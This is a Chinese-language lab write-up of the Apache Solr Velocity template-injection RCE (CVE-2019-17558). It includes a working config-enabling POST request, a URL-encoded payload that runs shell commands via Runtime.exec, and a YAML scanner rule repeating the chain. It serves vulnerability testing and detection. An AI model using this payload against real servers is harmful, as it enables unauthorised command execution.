Solr远程命令执行(CVE-2019-17558)-0h1in-漏洞文库小世界-安全文库-NGC660 安全实验室

Solr远程命令执行(CVE-2019-17558)-0h1in

漏洞描述

Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞在Solr系统上执行任意代码

影响版本

Apache Solr 5.0.0 ~ 8.3.1

环境部署

该环境可使用vulhub直接拉取

cd vulhub-master/solr/CVE-2019-17558
docker-compose up -d 
docker-compose ps 

1677807066844-aacc16f6-9901-471d-a610-556ae0853158
访问靶场环境
1677807236565-44478019-8d44-4000-be74-c702f1ddf5e5

漏洞利用

(1)默认情况下params.resource.loader.enabled配置未开启,无法使用自定义模板。
1677809142398-99c12b95-eae4-4380-811b-70020d5a09fb
可以先通过如下API获取所有的核心。

/solr/admin/cores?indexInfo=false&wt=json

1677807785258-a071ef66-97a0-4427-a48c-96799f5334f2
在vulhub中核心就是demo
(2)启用配置params.resource.loader.enable为true,在url访问/solr/demo/config,burpsuite抓包改成POST然后修改启动配置,添加请求体

POST /solr/demo/config HTTP/1.1
Host: 192.168.64.133:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

1677808988345-de8c78c1-22f7-4482-8dd4-21d96d76af1e
可以看到params.resource.loader.enable已经开启。
1677809043697-b0e04f7c-84c2-42a2-a460-abd557f791d8
(3)通过Velocity模板执行命令,如whoami。修改getRuntime().exec(%27whomai%27)中exec中的命令即可更改命令。
payload如下

/solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

1677809731353-6bad70db-5deb-41b9-8413-21ee1666a186

检测POC规则编写

params: []
name: Solr远程命令执行(CVE-2019-17558)
set: {}
rules:
- method: GET
  path: /solr/admin/cores?indexInfo=false&wt=json
  headers: {}
  body: ""
  search: '"name":"(?P<core>[^"]+)"'
  followredirects: false
  expression: response.status == 200
- method: POST
  path: /solr/{{core}}/config
  headers:
    Content-Type: application/json
  body: |-
    {
      "update-queryresponsewriter": {
        "startup": "lazy",
        "name": "velocity",
        "class": "solr.VelocityResponseWriter",
        "template.base.dir": "",
        "solr.resource.loader.enabled": "true",
        "params.resource.loader.enabled": "true"
      }
    }
  search: ""
  followredirects: false
  expression: response.status == 200 && response.body.bcontains(b"This response format
    is experimental.  It is likely to change in the future.")
- method: GET
  path: /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end
  headers:
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101
      Firefox/110.0
  body: ""
  search: ""
  followredirects: false
  expression: response.status == 200 && response.body.bcontains(b"uid=")
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""

1678167411282-8a0d6c2c-99c0-4008-8461-98f4b29e68e2

修复建议

建议升级Appache Salc到最新版

请登录后发表评论

    请登录后查看回复内容